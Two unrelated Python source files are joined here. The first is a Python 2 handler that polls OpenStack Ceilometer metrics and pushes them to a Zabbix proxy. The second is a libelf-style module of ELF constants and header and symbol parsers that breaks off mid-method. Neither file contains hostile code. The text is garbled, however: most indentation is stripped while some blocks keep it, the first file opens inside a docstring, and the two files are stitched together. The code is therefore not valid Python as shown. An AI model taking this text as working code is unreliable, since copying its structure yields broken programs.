Class for polling Ceilometer
This class provides the means to request authentication tokens to be used with OpenStack's Ceilometer, Nova and RabbitMQ
"""
__authors__ = "Claudio Marques, David Palma, Luis Cordeiro"
__copyright__ = "Copyright (c) 2014 OneSource Consultoria Informatica, Lda"
__license__ = "Apache 2"
__contact__ = "www.onesource.pt"
__date__ = "01/09/2014"
__version__ = "1.0"
import struct
import urllib2
import json
import socket
from threading import Timer
class CeilometerHandler:
def __init__(self, ceilometer_api_port, polling_interval, template_name, ceilometer_api_host, zabbix_host,
zabbix_port, zabbix_proxy_name, keystone_auth):
"""
TODO
:type self: object
"""
self.ceilometer_api_port = ceilometer_api_port
self.polling_interval = int(polling_interval)
self.template_name = template_name
self.ceilometer_api_host = ceilometer_api_host
self.zabbix_host = zabbix_host
self.zabbix_port = zabbix_port
self.zabbix_proxy_name = zabbix_proxy_name
self.keystone_auth = keystone_auth
def run(self):
self.token = self.keystone_auth.getToken()
Timer(self.polling_interval, self.run, ()).start()
host_list = self.get_hosts_ID()
self.update_values(host_list)
def get_hosts_ID(self):
"""
        Method used to query the Zabbix API in order to build an array of hosts
        :return: returns an array of servers and the items to monitor for each server
"""
data = {"request": "proxy config", "host": self.zabbix_proxy_name}
payload = self.set_proxy_header(data)
response = self.connect_zabbix(payload)
hosts_id = []
items = []
for line in response['hosts']['data']:
for line2 in response['items']['data']:
if line2[4] == line[0]:
items.append(line2[5])
hosts_id.append([line[0], line[1], items, line[7]])
items = []
return hosts_id
def update_values(self, hosts_id):
"""
        Query Ceilometer for every monitored host and push the resulting samples to Zabbix.
        :param hosts_id: array of hosts built by get_hosts_ID()
"""
for host in hosts_id:
links = []
if not host[1] == self.template_name:
print "Checking host:" + host[3]
#Get links for instance compute metrics
request = urllib2.urlopen(urllib2.Request(
"http://" + self.ceilometer_api_host + ":" + self.ceilometer_api_port +
"/v2/resources?q.field=resource_id&q.value=" + host[1],
headers={"Accept": "application/json", "Content-Type": "application/json",
"X-Auth-Token": self.token})).read()
# Filter the links to an array
for line in json.loads(request):
for line2 in line['links']:
if line2['rel'] in ('cpu', 'cpu_util', 'disk.read.bytes', 'disk.read.requests',
'disk.write.bytes', 'disk.write.requests'):
links.append(line2)
# Get the links regarding network metrics
request = urllib2.urlopen(urllib2.Request(
"http://" + self.ceilometer_api_host + ":" + self.ceilometer_api_port +
"/v2/resources?q.field=metadata.instance_id&q.value=" + host[1],
headers={"Accept": "application/json","Content-Type": "application/json",
"X-Auth-Token": self.token})).read()
# Add more links to the array
for line in json.loads(request):
for line2 in line['links']:
if line2['rel'] in ('network.incoming.bytes', 'network.incoming.packets',
'network.outgoing.bytes', 'network.outgoing.packets'):
links.append(line2)
# Query ceilometer API using the array of links
for line in links:
self.query_ceilometer(host[1], line['rel'], line['href'])
print " - Item " + line['rel']
def query_ceilometer(self, resource_id, item_key, link):
"""
        Query the Ceilometer API for the latest sample of a meter and forward it to Zabbix.
        :param resource_id: ID of the resource the sample belongs to
        :param item_key: Zabbix item key the sample maps to
        :param link: Ceilometer URL for the meter
"""
        try:
            contents = urllib2.urlopen(urllib2.Request(link + str("&limit=1"),
                                       headers={"Accept": "application/json",
                                                "Content-Type": "application/json",
                                                "X-Auth-Token": self.token})).read()
        except urllib2.HTTPError, e:
            if e.code == 401:
                print "401"
                print "Error... \nToken refused! Please check your credentials"
            elif e.code == 404:
                print 'not found'
            elif e.code == 503:
                print 'service unavailable'
            else:
                print 'unknown error'
            # No usable payload was retrieved; skip this item.
            return
        response = json.loads(contents)
        try:
            counter_volume = response[0]['counter_volume']
            self.send_data_zabbix(counter_volume, resource_id, item_key)
        except (IndexError, KeyError):
            # Ceilometer returned no sample for this meter; nothing to send.
            pass
def connect_zabbix(self, payload):
"""
Method used to send information to Zabbix
:param payload: refers to the json message prepared to send to Zabbix
:rtype : returns the response received by the Zabbix API
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.zabbix_host, int(self.zabbix_port)))
s.send(payload)
# read its response, the first five bytes are the header again
response_header = s.recv(5, socket.MSG_WAITALL)
if not response_header == 'ZBXD\1':
raise ValueError('Got invalid response')
# read the data header to get the length of the response
response_data_header = s.recv(8, socket.MSG_WAITALL)
response_data_header = response_data_header[:4]
response_len = struct.unpack('i', response_data_header)[0]
# read the whole rest of the response now that we know the length
response_raw = s.recv(response_len, socket.MSG_WAITALL)
s.close()
response = json.loads(response_raw)
return response
def set_proxy_header(self, data):
"""
Method used to simplify constructing the protocol to communicate with Zabbix
:param data: refers to the json message
:rtype : returns the message ready to send to Zabbix server with the right header
"""
        payload = json.dumps(data)
        data_header = struct.pack('i', len(payload)) + '\0\0\0\0'
        HEADER = '''ZBXD\1%s%s'''
        data_to_send = HEADER % (data_header, payload)
        return data_to_send
def send_data_zabbix(self, counter_volume, resource_id, item_key):
"""
Method used to prepare the body with data from Ceilometer and send it to Zabbix using connect_zabbix method
:param counter_volume: the actual measurement
:param resource_id: refers to the resource ID
:param item_key: refers to the item key
"""
tmp = json.dumps(counter_volume)
data = {"request": "history data", "host": self.zabbix_proxy_name,
"data": [{"host": resource_id,
"key": item_key,
"value": tmp}]}
payload = self.set_proxy_header(data)
self.connect_zabbix(payload)
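# Stand-alone sketch of the Zabbix sender/proxy wire format that
# set_proxy_header and connect_zabbix rely on: the 5-byte signature "ZBXD\1",
# an 8-byte little-endian length field, then the JSON payload. The handler
# above builds the same 8 length bytes as a 4-byte native int plus 4 zero
# bytes, which matches this on little-endian hosts.
def _demo_frame_zabbix_payload(data):
    payload = json.dumps(data)
    header = 'ZBXD\1' + struct.pack('<Q', len(payload))
    return header + payload

# Example: _demo_frame_zabbix_payload({"request": "proxy config", "host": "proxy1"})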
|
|
#===============================================================================
# libelf python implementation. Allow listing of sections/symbols.
#===============================================================================
import mmap
import struct
#===============================================================================
# Content of e_ident.
#===============================================================================
EI_NIDENT = 16 # Size of e_ident
EI_MAG0 = 0 # File identification byte 0 index
ELFMAG0 = 0x7f # Magic number byte 0
EI_MAG1 = 1 # File identification byte 1 index
ELFMAG1 = ord("E") # Magic number byte 1
EI_MAG2 = 2 # File identification byte 2 index
ELFMAG2 = ord("L") # Magic number byte 2
EI_MAG3 = 3 # File identification byte 3 index
ELFMAG3 = ord("F") # Magic number byte 3
EI_CLASS = 4 # File class
ELFCLASSNONE = 0 # Invalid class
ELFCLASS32 = 1 # 32-bit objects
ELFCLASS64 = 2 # 64-bit objects
EI_DATA = 5 # Data encoding
ELFDATANONE = 0 # Invalid data encoding
ELFDATA2LSB = 1 # 2's complement, little endian
ELFDATA2MSB = 2 # 2's complement, big endian
EI_VERSION = 6 # File version
EI_OSABI = 7 # Operating System/ABI indication
ELFOSABI_NONE = 0 # UNIX System V ABI
ELFOSABI_HPUX = 1 # HP-UX operating system
ELFOSABI_NETBSD = 2 # NetBSD
ELFOSABI_LINUX = 3 # GNU/Linux
ELFOSABI_HURD = 4 # GNU/Hurd
ELFOSABI_SOLARIS = 6 # Solaris
ELFOSABI_AIX = 7 # AIX
ELFOSABI_IRIX = 8 # IRIX
ELFOSABI_FREEBSD = 9 # FreeBSD
ELFOSABI_TRU64 = 10 # TRU64 UNIX
ELFOSABI_MODESTO = 11 # Novell Modesto
ELFOSABI_OPENBSD = 12 # OpenBSD
ELFOSABI_OPENVMS = 13 # OpenVMS
ELFOSABI_NSK = 14 # Hewlett-Packard Non-Stop Kernel
ELFOSABI_AROS = 15 # AROS
ELFOSABI_ARM_AEABI = 64 # ARM EABI
ELFOSABI_ARM = 97 # ARM
ELFOSABI_STANDALONE = 255 # Standalone (embedded) application
EI_ABIVERSION = 8 # ABI version
EI_PAD = 9 # Start of padding bytes
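# Small helper sketch (not used by the classes below): check the e_ident
# magic bytes defined above against the start of an arbitrary file.
def _looks_like_elf(filePath):
    with open(filePath, "rb") as f:
        ident = bytearray(f.read(EI_NIDENT))
    return (len(ident) == EI_NIDENT and
            ident[EI_MAG0] == ELFMAG0 and ident[EI_MAG1] == ELFMAG1 and
            ident[EI_MAG2] == ELFMAG2 and ident[EI_MAG3] == ELFMAG3)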
#===============================================================================
# Values for e_type, which identifies the object file type.
#===============================================================================
ET_NONE = 0 # No file type
ET_REL = 1 # Relocatable file
ET_EXEC = 2 # Executable file
ET_DYN = 3 # Shared object file
ET_CORE = 4 # Core file
ET_NUM = 5 # Number of defined types
ET_LOOS = 0xfe00 # Operating system-specific
ET_HIOS = 0xfeff # Operating system-specific
ET_LOPROC = 0xff00 # Processor-specific
ET_HIPROC = 0xffff # Processor-specific
#===============================================================================
# Legal values for e_machine (architecture).
#===============================================================================
EM_NONE = 0 # No machine
EM_M32 = 1 # AT&T WE 32100
EM_SPARC = 2 # SUN SPARC
EM_386 = 3 # Intel 80386
EM_68K = 4 # Motorola m68k family
EM_88K = 5 # Motorola m88k family
EM_860 = 7 # Intel 80860
EM_MIPS = 8 # MIPS R3000 big-endian
EM_S370 = 9 # IBM System/370
EM_MIPS_RS3_LE = 10 # MIPS R3000 little-endian
EM_PARISC = 15 # HPPA
EM_VPP500 = 17 # Fujitsu VPP500
EM_SPARC32PLUS = 18 # Sun's "v8plus"
EM_960 = 19 # Intel 80960
EM_PPC = 20 # PowerPC
EM_PPC64 = 21 # PowerPC 64-bit
EM_S390 = 22 # IBM S390
EM_V800 = 36 # NEC V800 series
EM_FR20 = 37 # Fujitsu FR20
EM_RH32 = 38 # TRW RH-32
EM_RCE = 39 # Motorola RCE
EM_ARM = 40 # ARM
EM_FAKE_ALPHA = 41 # Digital Alpha
EM_SH = 42 # Hitachi SH
EM_SPARCV9 = 43 # SPARC v9 64-bit
EM_TRICORE = 44 # Siemens Tricore
EM_ARC = 45 # Argonaut RISC Core
EM_H8_300 = 46 # Hitachi H8/300
EM_H8_300H = 47 # Hitachi H8/300H
EM_H8S = 48 # Hitachi H8S
EM_H8_500 = 49 # Hitachi H8/500
EM_IA_64 = 50 # Intel Merced
EM_MIPS_X = 51 # Stanford MIPS-X
EM_COLDFIRE = 52 # Motorola Coldfire
EM_68HC12 = 53 # Motorola M68HC12
EM_MMA = 54 # Fujitsu MMA Multimedia Accelerator
EM_PCP = 55 # Siemens PCP
EM_NCPU = 56            # Sony nCPU embedded RISC
EM_NDR1 = 57 # Denso NDR1 microprocessor
EM_STARCORE = 58 # Motorola Start*Core processor
EM_ME16 = 59 # Toyota ME16 processor
EM_ST100 = 60 # STMicroelectronic ST100 processor
EM_TINYJ = 61 # Advanced Logic Corp. Tinyj emb.fam
EM_X86_64 = 62 # AMD x86-64 architecture
EM_PDSP = 63 # Sony DSP Processor
EM_FX66 = 66 # Siemens FX66 microcontroller
EM_ST9PLUS = 67 # STMicroelectronics ST9+ 8/16 mc
EM_ST7 = 68 # STmicroelectronics ST7 8 bit mc
EM_68HC16 = 69 # Motorola MC68HC16 microcontroller
EM_68HC11 = 70 # Motorola MC68HC11 microcontroller
EM_68HC08 = 71 # Motorola MC68HC08 microcontroller
EM_68HC05 = 72 # Motorola MC68HC05 microcontroller
EM_SVX = 73 # Silicon Graphics SVx
EM_ST19 = 74 # STMicroelectronics ST19 8 bit mc
EM_VAX = 75 # Digital VAX
EM_CRIS = 76 # Axis Communications 32-bit embedded processor
EM_JAVELIN = 77 # Infineon Technologies 32-bit embedded processor
EM_FIREPATH = 78 # Element 14 64-bit DSP Processor
EM_ZSP = 79 # LSI Logic 16-bit DSP Processor
EM_MMIX = 80 # Donald Knuth's educational 64-bit processor
EM_HUANY = 81 # Harvard University machine-independent object files
EM_PRISM = 82 # SiTera Prism
EM_AVR = 83 # Atmel AVR 8-bit microcontroller
EM_FR30 = 84 # Fujitsu FR30
EM_D10V = 85 # Mitsubishi D10V
EM_D30V = 86 # Mitsubishi D30V
EM_V850 = 87 # NEC v850
EM_M32R = 88 # Mitsubishi M32R
EM_MN10300 = 89 # Matsushita MN10300
EM_MN10200 = 90 # Matsushita MN10200
EM_PJ = 91 # picoJava
EM_OPENRISC = 92 # OpenRISC 32-bit embedded processor
EM_ARC_A5 = 93 # ARC Cores Tangent-A5
EM_XTENSA = 94 # Tensilica Xtensa Architecture
EM_ALTERA_NIOS2 = 113 # Altera Nios II
EM_AARCH64 = 183 # ARM AARCH64
EM_TILEPRO = 188 # Tilera TILEPro
EM_MICROBLAZE = 189 # Xilinx MicroBlaze
EM_TILEGX = 191 # Tilera TILE-Gx
EM_NUM = 192 #
#===============================================================================
# Values for e_version (version).
#===============================================================================
EV_NONE = 0 # Invalid ELF version
EV_CURRENT = 1 # Current version
EV_NUM = 2 #
#===============================================================================
# Special section indices, which may show up in st_shndx fields
#===============================================================================
SHN_UNDEF = 0           # Undefined section
SHN_LORESERVE = 0xff00 # Begin range of reserved indices
SHN_LOPROC = 0xff00 # Begin range of appl-specific
SHN_HIPROC = 0xff1f # End range of appl-specific
SHN_LOOS = 0xff20 # OS specific semantics, lo
SHN_HIOS = 0xff3f # OS specific semantics, hi
SHN_ABS = 0xfff1 # Associated symbol is absolute
SHN_COMMON = 0xfff2 # Associated symbol is in common
SHN_XINDEX = 0xffff # Section index is held elsewhere
SHN_HIRESERVE = 0xffff # End range of reserved indices
#===============================================================================
# Values for sh_type (section type).
#===============================================================================
SHT_NULL = 0 # Section header table entry unused
SHT_PROGBITS = 1 # Program specific (private) data
SHT_SYMTAB = 2 # Link editing symbol table
SHT_STRTAB = 3 # A string table
SHT_RELA = 4 # Relocation entries with addends
SHT_HASH = 5 # A symbol hash table
SHT_DYNAMIC = 6 # Information for dynamic linking
SHT_NOTE = 7 # Information that marks file
SHT_NOBITS = 8 # Section occupies no space in file
SHT_REL = 9 # Relocation entries, no addends
SHT_SHLIB = 10 # Reserved, unspecified semantics
SHT_DYNSYM = 11 # Dynamic linking symbol table
SHT_INIT_ARRAY = 14 # Array of ptrs to init functions
SHT_FINI_ARRAY = 15 # Array of ptrs to finish functions
SHT_PREINIT_ARRAY = 16 # Array of ptrs to pre-init funcs
SHT_GROUP = 17 # Section contains a section group
SHT_SYMTAB_SHNDX = 18   # Indices for SHN_XINDEX entries
SHT_LOOS = 0x60000000 # First of OS specific semantics
SHT_HIOS = 0x6fffffff # Last of OS specific semantics
SHT_LOPROC = 0x70000000 # Processor-specific semantics, lo
SHT_HIPROC = 0x7fffffff # Processor-specific semantics, hi
SHT_LOUSER = 0x80000000 # Application-specific semantics
SHT_HIUSER = 0xffffffff # Application-specific semantics
SHT_GNU_ATTRIBUTES = 0x6ffffff5 # Object attributes
SHT_GNU_HASH = 0x6ffffff6 # GNU style symbol hash table
SHT_GNU_LIBLIST = 0x6ffffff7 # List of prelink dependencies
SHT_GNU_verdef = 0x6ffffffd # Versions defined by file
SHT_GNU_verneed = 0x6ffffffe # Versions needed by file
SHT_GNU_versym = 0x6fffffff # Symbol versions
#===============================================================================
# Values for sh_flags (section flags)
#===============================================================================
SHF_WRITE = (1 << 0) # Writable data during execution
SHF_ALLOC = (1 << 1) # Occupies memory during execution
SHF_EXECINSTR = (1 << 2) # Executable machine instructions
SHF_MERGE = (1 << 4) # Data in this section can be merged
SHF_STRINGS = (1 << 5) # Contains null terminated character strings
SHF_INFO_LINK = (1 << 6) # sh_info holds section header table index
SHF_LINK_ORDER = (1 << 7) # Preserve section ordering when linking
SHF_OS_NONCONFORMING = (1 << 8) # OS specific processing required
SHF_GROUP = (1 << 9) # Member of a section group
SHF_TLS = (1 << 10) # Thread local storage section
SHF_MASKOS = 0x0ff00000 # OS-specific semantics
SHF_MASKPROC = 0xf0000000 # Processor-specific semantics
#===============================================================================
# Values for p_type (segment type).
#===============================================================================
PT_NULL = 0 # Program header table entry unused
PT_LOAD = 1 # Loadable program segment
PT_DYNAMIC = 2 # Dynamic linking information
PT_INTERP = 3 # Program interpreter
PT_NOTE = 4 # Auxiliary information
PT_SHLIB = 5 # Reserved
PT_PHDR = 6 # Entry for header table itself
PT_TLS = 7 # Thread-local storage segment
PT_NUM = 8 # Number of defined types
PT_LOOS = 0x60000000 # Start of OS-specific
PT_HIOS = 0x6fffffff # End of OS-specific
PT_LOPROC = 0x70000000 # Start of processor-specific
PT_HIPROC = 0x7fffffff # End of processor-specific
PT_GNU_EH_FRAME = 0x6474e550 # GCC .eh_frame_hdr segment
PT_GNU_STACK = 0x6474e551 # Indicates stack executability
PT_GNU_RELRO = 0x6474e552 # Read-only after relocation
#===============================================================================
# Values for p_flags (segment flags).
#===============================================================================
PF_X = (1 << 0) # Segment is executable
PF_W = (1 << 1) # Segment is writable
PF_R = (1 << 2) # Segment is readable
PF_MASKOS = 0x0ff00000 # OS-specific
PF_MASKPROC = 0xf0000000 # Processor-specific
#===============================================================================
# Values for ST_BIND subfield of st_info (symbol binding).
#===============================================================================
STB_LOCAL = 0 # Local symbol
STB_GLOBAL = 1 # Global symbol
STB_WEAK = 2 # Weak symbol
STB_NUM = 3 # Number of defined types
STB_LOOS = 10 # Start of OS-specific
STB_HIOS = 12 # End of OS-specific
STB_LOPROC = 13 # Start of processor-specific
STB_HIPROC = 15 # End of processor-specific
STB_GNU_UNIQUE = 10 # Unique symbol
#===============================================================================
# Values for ST_TYPE subfield of st_info (symbol type).
#===============================================================================
STT_NOTYPE = 0 # Symbol type is unspecified
STT_OBJECT = 1 # Symbol is a data object
STT_FUNC = 2 # Symbol is a code object
STT_SECTION = 3 # Symbol associated with a section
STT_FILE = 4 # Symbol's name is file name
STT_COMMON = 5 # Symbol is a common data object
STT_TLS = 6 # Symbol is thread-local data object
STT_NUM = 7 # Number of defined types
STT_LOOS = 10 # Start of OS-specific
STT_HIOS = 12 # End of OS-specific
STT_LOPROC = 13 # Start of processor-specific
STT_HIPROC = 15 # End of processor-specific
STT_GNU_IFUNC = 10 # Symbol is indirect code object
#===============================================================================
# Symbol visibility specification encoded in the st_other field.
#===============================================================================
STV_DEFAULT = 0 # Default symbol visibility rules
STV_INTERNAL = 1 # Processor specific hidden class
STV_HIDDEN = 2 # Sym unavailable in other modules
STV_PROTECTED = 3 # Not preemptible, not exported
#===============================================================================
# Values for d_tag (dynamic entry type).
#===============================================================================
DT_NULL = 0 # Marks end of dynamic section
DT_NEEDED = 1 # Name of needed library
DT_PLTRELSZ = 2 # Size in bytes of PLT relocs
DT_PLTGOT = 3 # Processor defined value
DT_HASH = 4 # Address of symbol hash table
DT_STRTAB = 5 # Address of string table
DT_SYMTAB = 6 # Address of symbol table
DT_RELA = 7 # Address of Rela relocs
DT_RELASZ = 8 # Total size of Rela relocs
DT_RELAENT = 9 # Size of one Rela reloc
DT_STRSZ = 10 # Size of string table
DT_SYMENT = 11 # Size of one symbol table entry
DT_INIT = 12 # Address of init function
DT_FINI = 13 # Address of termination function
DT_SONAME = 14 # Name of shared object
DT_RPATH = 15 # Library search path (deprecated)
DT_SYMBOLIC = 16 # Start symbol search here
DT_REL = 17 # Address of Rel relocs
DT_RELSZ = 18 # Total size of Rel relocs
DT_RELENT = 19 # Size of one Rel reloc
DT_PLTREL = 20 # Type of reloc in PLT
DT_DEBUG = 21 # For debugging; unspecified
DT_TEXTREL = 22 # Reloc might modify .text
DT_JMPREL = 23 # Address of PLT relocs
DT_BIND_NOW = 24 # Process relocations of object
DT_INIT_ARRAY = 25 # Array with addresses of init fct
DT_FINI_ARRAY = 26 # Array with addresses of fini fct
DT_INIT_ARRAYSZ = 27 # Size in bytes of DT_INIT_ARRAY
DT_FINI_ARRAYSZ = 28 # Size in bytes of DT_FINI_ARRAY
DT_RUNPATH = 29 # Library search path
DT_FLAGS = 30 # Flags for the object being loaded
DT_ENCODING = 32 # Start of encoded range
DT_PREINIT_ARRAY = 32 # Array with addresses of preinit fct
DT_PREINIT_ARRAYSZ = 33 # size in bytes of DT_PREINIT_ARRAY
DT_NUM = 34 # Number used
DT_LOOS = 0x6000000d # Start of OS-specific
DT_HIOS = 0x6ffff000 # End of OS-specific
DT_LOPROC = 0x70000000 # Start of processor-specific
DT_HIPROC = 0x7fffffff # End of processor-specific
# Versioning entry types. Defined as part of the GNU extension.
DT_VERSYM = 0x6ffffff0 #
DT_RELACOUNT = 0x6ffffff9 #
DT_RELCOUNT = 0x6ffffffa #
DT_FLAGS_1 = 0x6ffffffb # State flags, see DF_1_* below.
DT_VERDEF = 0x6ffffffc # Address of version definition table
DT_VERDEFNUM = 0x6ffffffd # Number of version definitions
DT_VERNEED = 0x6ffffffe # Address of table with needed versions
DT_VERNEEDNUM = 0x6fffffff # Number of needed versions
#===============================================================================
# Values of d_val in the DT_FLAGS entry.
#===============================================================================
DF_ORIGIN = 0x00000001 # Object may use DF_ORIGIN
DF_SYMBOLIC = 0x00000002 # Symbol resolutions starts here
DF_TEXTREL = 0x00000004 # Object contains text relocations
DF_BIND_NOW = 0x00000008 # No lazy binding for this object
DF_STATIC_TLS = 0x00000010 # Module uses the static TLS model
#===============================================================================
# State flags selectable in the d_val element of the DT_FLAGS_1 entry.
#===============================================================================
DF_1_NOW = 0x00000001 # Set RTLD_NOW for this object.
DF_1_GLOBAL = 0x00000002 # Set RTLD_GLOBAL for this object.
DF_1_GROUP = 0x00000004 # Set RTLD_GROUP for this object.
DF_1_NODELETE = 0x00000008 # Set RTLD_NODELETE for this object.
DF_1_LOADFLTR = 0x00000010 # Trigger filtee loading at runtime.
DF_1_INITFIRST = 0x00000020 # Set RTLD_INITFIRST for this object
DF_1_NOOPEN = 0x00000040 # Set RTLD_NOOPEN for this object.
DF_1_ORIGIN = 0x00000080 # $ORIGIN must be handled.
DF_1_DIRECT = 0x00000100 # Direct binding enabled.
DF_1_TRANS = 0x00000200 #
DF_1_INTERPOSE = 0x00000400 # Object is used to interpose.
DF_1_NODEFLIB = 0x00000800 # Ignore default lib search path.
DF_1_NODUMP = 0x00001000 # Object can't be dldump'ed.
DF_1_CONFALT = 0x00002000 # Configuration alternative created.
DF_1_ENDFILTEE = 0x00004000 # Filtee terminates filters search.
DF_1_DISPRELDNE = 0x00008000 # Disp reloc applied at build time.
DF_1_DISPRELPND = 0x00010000 # Disp reloc applied at run-time.
#===============================================================================
# ARM specific declarations
#===============================================================================
EF_ARM_ABI_FLOAT_SOFT = 0x200
EF_ARM_ABI_FLOAT_HARD = 0x400
EF_ARM_EABIMASK = 0xff000000
EF_ARM_EABI_UNKNOWN = 0x00000000
EF_ARM_EABI_VER1 = 0x01000000
EF_ARM_EABI_VER2 = 0x02000000
EF_ARM_EABI_VER3 = 0x03000000
EF_ARM_EABI_VER4 = 0x04000000
EF_ARM_EABI_VER5 = 0x05000000
#===============================================================================
#===============================================================================
class ElfError(Exception):
pass
#===============================================================================
# The ELF file header. This appears at the start of every ELF file.
#===============================================================================
class ElfEhdr(object):
size32 = 52
size64 = 64
def __init__(self, buf):
# Read e_ident first so we can get information
self.e_ident = struct.unpack("%dB" % EI_NIDENT, buf[0:EI_NIDENT])
if self.e_ident[EI_MAG0] != ELFMAG0 \
or self.e_ident[EI_MAG1] != ELFMAG1 \
or self.e_ident[EI_MAG2] != ELFMAG2 \
or self.e_ident[EI_MAG3] != ELFMAG3:
raise ElfError("Bad magic in Ehdr")
# Check encoding
        if not self.isLSB() and not self.isMSB():
raise ElfError("Bad encoding in Ehdr")
# Setup format based on class
if self.is32Bit():
fmt = self.getFmtPrefix() + "HHIIIIIHHHHHH"
self.size = ElfEhdr.size32
elif self.is64Bit():
fmt = self.getFmtPrefix() + "HHIQQQIHHHHHH"
self.size = ElfEhdr.size64
else:
raise ElfError("Bad class in Ehdr")
# Save fields (same order for 32-bit/64-bit)
fields = struct.unpack(fmt, buf[EI_NIDENT:self.size])
self.e_type = fields[0] # Object file type
self.e_machine = fields[1] # Architecture
self.e_version = fields[2] # Object file version
self.e_entry = fields[3] # Entry point virtual address
self.e_phoff = fields[4] # Program header table file offset
self.e_shoff = fields[5] # Section header table file offset
self.e_flags = fields[6] # Processor-specific flags
self.e_ehsize = fields[7] # ELF header size in bytes
self.e_phentsize = fields[8] # Program header table entry size
self.e_phnum = fields[9] # Program header table entry count
self.e_shentsize = fields[10] # Section header table entry size
self.e_shnum = fields[11] # Section header table entry count
self.e_shstrndx = fields[12] # Section header string table index
def isLSB(self):
return self.e_ident[EI_DATA] == ELFDATA2LSB
def isMSB(self):
return self.e_ident[EI_DATA] == ELFDATA2MSB
def is32Bit(self):
return self.e_ident[EI_CLASS] == ELFCLASS32
def is64Bit(self):
return self.e_ident[EI_CLASS] == ELFCLASS64
def getFmtPrefix(self):
return "<" if self.isLSB() else ">"
def __str__(self):
return \
"{e_type=0x%x, e_machine=0x%x, e_version=0x%x, e_entry=0x%x, " \
"e_phoff=0x%x, e_shoff=0x%x, e_flags=0x%x, e_ehsize=0x%x, " \
"e_phentsize=0x%x, e_phnum=0x%x, e_shentsize=0x%x, " \
"e_shnum=0x%x, e_shstrndx=0x%x}" % \
(self.e_type, self.e_machine, self.e_version, self.e_entry,
self.e_phoff, self.e_shoff, self.e_flags, self.e_ehsize,
self.e_phentsize, self.e_phnum, self.e_shentsize,
self.e_shnum, self.e_shstrndx)
#===============================================================================
# Section header.
#===============================================================================
class ElfShdr(object):
size32 = 40
size64 = 64
def __init__(self, elf, idx, buf):
self.idx = idx
self.namestr = None
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "IIIIIIIIII"
            self.size = ElfShdr.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "IIQQQQIIQQ"
            self.size = ElfShdr.size64
# Save fields (same order for 32-bit/64-bit)
fields = struct.unpack(fmt, buf)
self.sh_name = fields[0] # Section name (string tbl index)
self.sh_type = fields[1] # Section type
self.sh_flags = fields[2] # Section flags
self.sh_addr = fields[3] # Section virtual addr at execution
self.sh_offset = fields[4] # Section file offset
self.sh_size = fields[5] # Section size in bytes
self.sh_link = fields[6] # Link to another section
self.sh_info = fields[7] # Additional section information
self.sh_addralign = fields[8] # Section alignment
self.sh_entsize = fields[9] # Entry size if section holds table
def __str__(self):
return \
"{sh_name=0x%x, sh_type=0x%x, sh_flags=0x%x, sh_addr=0x%x, " \
"sh_offset=0x%x, sh_size=0x%x, sh_link=0x%x, sh_info=0x%x, " \
"sh_addralign=0x%x, sh_entsize=0x%x, namestr='%s'}" % \
(self.sh_name, self.sh_type, self.sh_flags, self.sh_addr,
self.sh_offset, self.sh_size, self.sh_link, self.sh_info,
self.sh_addralign, self.sh_entsize, self.namestr)
#===============================================================================
# Program segment header.
#===============================================================================
class ElfPhdr(object):
size32 = 32
size64 = 56
def __init__(self, elf, idx, buf):
self.idx = idx
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "IIIIIIII"
self.size = ElfPhdr.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "IIQQQQQQ"
self.size = ElfPhdr.size64
# Save fields (order depends on 32-bit/64-bit)
fields = struct.unpack(fmt, buf)
if elf.ehdr.is32Bit():
self.p_type = fields[0] # Segment type
self.p_offset = fields[1] # Segment file offset
self.p_vaddr = fields[2] # Segment virtual address
self.p_paddr = fields[3] # Segment physical address
self.p_filesz = fields[4] # Segment size in file
self.p_memsz = fields[5] # Segment size in memory
self.p_flags = fields[6] # Segment flags
self.p_align = fields[7] # Segment alignment
else:
self.p_type = fields[0] # Segment type
self.p_flags = fields[1] # Segment flags
self.p_offset = fields[2] # Segment file offset
self.p_vaddr = fields[3] # Segment virtual address
self.p_paddr = fields[4] # Segment physical address
self.p_filesz = fields[5] # Segment size in file
self.p_memsz = fields[6] # Segment size in memory
self.p_align = fields[7] # Segment alignment
def __str__(self):
return \
"{p_type=0x%x, p_offset=0x%x, p_vaddr=0x%x, p_paddr=0x%x, " \
"p_filesz=0x%x, p_memsz=0x%x, p_flags=0x%x, p_align=0x%x}" % \
(self.p_type, self.p_offset, self.p_vaddr, self.p_paddr,
self.p_filesz, self.p_memsz, self.p_flags, self.p_align)
#===============================================================================
#===============================================================================
class ElfSym(object):
size32 = 16
size64 = 24
def __init__(self, elf, idx, buf):
self.idx = idx
self.namestr = None
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "IIIBBH"
self.size = ElfSym.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "IBBHQQ"
self.size = ElfSym.size64
# Save fields (order depends on 32-bit/64-bit)
fields = struct.unpack(fmt, buf)
if elf.ehdr.is32Bit():
self.st_name = fields[0] # Symbol name (string tbl index)
self.st_value = fields[1] # Symbol value
self.st_size = fields[2] # Symbol size
self.st_info = fields[3] # Symbol type and binding
self.st_other = fields[4] # Symbol visibility
self.st_shndx = fields[5] # Section index
else:
self.st_name = fields[0] # Symbol name (string tbl index)
self.st_info = fields[1] # Symbol type and binding
self.st_other = fields[2] # Symbol visibility
self.st_shndx = fields[3] # Section index
self.st_value = fields[4] # Symbol value
self.st_size = fields[5] # Symbol size
self.st_type = self.st_info&0xf
self.st_bind = (self.st_info>>4)&0xf
self.st_visibility = self.st_other&0x3
def __str__(self):
return \
"{st_name=0x%x, st_value=0x%x, st_size=0x%x, st_type=0x%x, " \
"st_bind=0x%x, st_visibility=0x%x, st_shndx=0x%x, namestr='%s'}" % \
(self.st_name, self.st_value, self.st_size, self.st_type,
self.st_bind, self.st_visibility, self.st_shndx, self.namestr)
#===============================================================================
#===============================================================================
class ElfDyn(object):
size32 = 8
size64 = 16
strTags = [DT_NEEDED, DT_SONAME, DT_RPATH, DT_RUNPATH]
def __init__(self, elf, idx, buf):
self.idx = idx
self.valstr = None
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "II"
self.size = ElfDyn.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "QQ"
self.size = ElfDyn.size64
# Save fields
fields = struct.unpack(fmt, buf)
self.d_tag = fields[0]
self.d_val = fields[1]
def __str__(self):
if self.valstr is not None:
